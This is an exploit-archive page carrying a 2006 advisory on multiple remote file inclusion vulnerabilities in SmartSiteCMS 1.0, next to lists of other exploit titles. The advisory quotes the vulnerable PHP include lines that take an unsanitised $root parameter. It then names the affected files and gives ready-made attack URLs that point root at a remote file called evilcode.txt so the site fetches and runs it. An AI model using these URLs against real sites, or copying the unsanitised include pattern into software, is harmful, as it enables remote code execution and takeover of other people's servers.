exploits , vulnerabilities , articles , SmartSiteCMS 1.0 (root) Multiple Remote File Inclusion Vulnerabilities

2007-06-09 e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit
2007-05-22 TutorialCMS <= 1.01 Authentication Bypass Vulnerability
2007-04-16 audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities
2007-04-14 bloofoxCMS 0.2.2 Cross Site Scripting
2007-04-14 Frogss CMS <= 0.7 Remote SQL Injection Exploit
2007-04-10 SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2006-07-01

SmartSiteCMS 1.0 (root) Multiple Remote File Inclusion Vulnerabilities

Rated as : High Risk

smartsite cms  v1.0 Multiple Remote File include
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Arabian Security Team
-------------------------------------------------
site of script:www.smartsitecms.net
-------------------------------------------------
Vulnerable: smartsite cms  v1.0
-------------------------------------------------
vulnerable code:
----------------------
1-in comment.php :
require($root . "include/inc_foot.php");
---------------------------------------
2-in /admin/test.php :
require($root . "include/inc_adminfooter.php");
---------------------------------------
3-in /admin/index.php :
require($root . "admin/include/inc_adminfooter.php");
---------------------------------------
4-in /admin/include/inc_adminfoot.php:
require($root . "include/inc_footer.php");
---------------------------------------
$root parameter File include
-----------------------------------------------------------------------------------------------------------------------------------------
vulnerable files  :
--------------------
comment.php
/admin/test.php
/admin/index.php
/admin/include/inc_adminfoot.php
-------------------------------------------------
example:
www.example.com/(path)/admin/test.php?root=http://evilcode.txt?
www.example.com/(path)/comment.php?root=http://evilcode.txt?
www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=http://evilcode.txt?
www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilcode.txt?
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23@hotmail.com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG
HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,
mr-hcr AND ALL LEZR.COM Member
securitydot.net - 2006-07-01

Exploits - newest 10 RSS | More

2007-06-15 56605 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33710 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41870 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28947 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19468 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16466 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19121 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16329 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33238 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16989 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit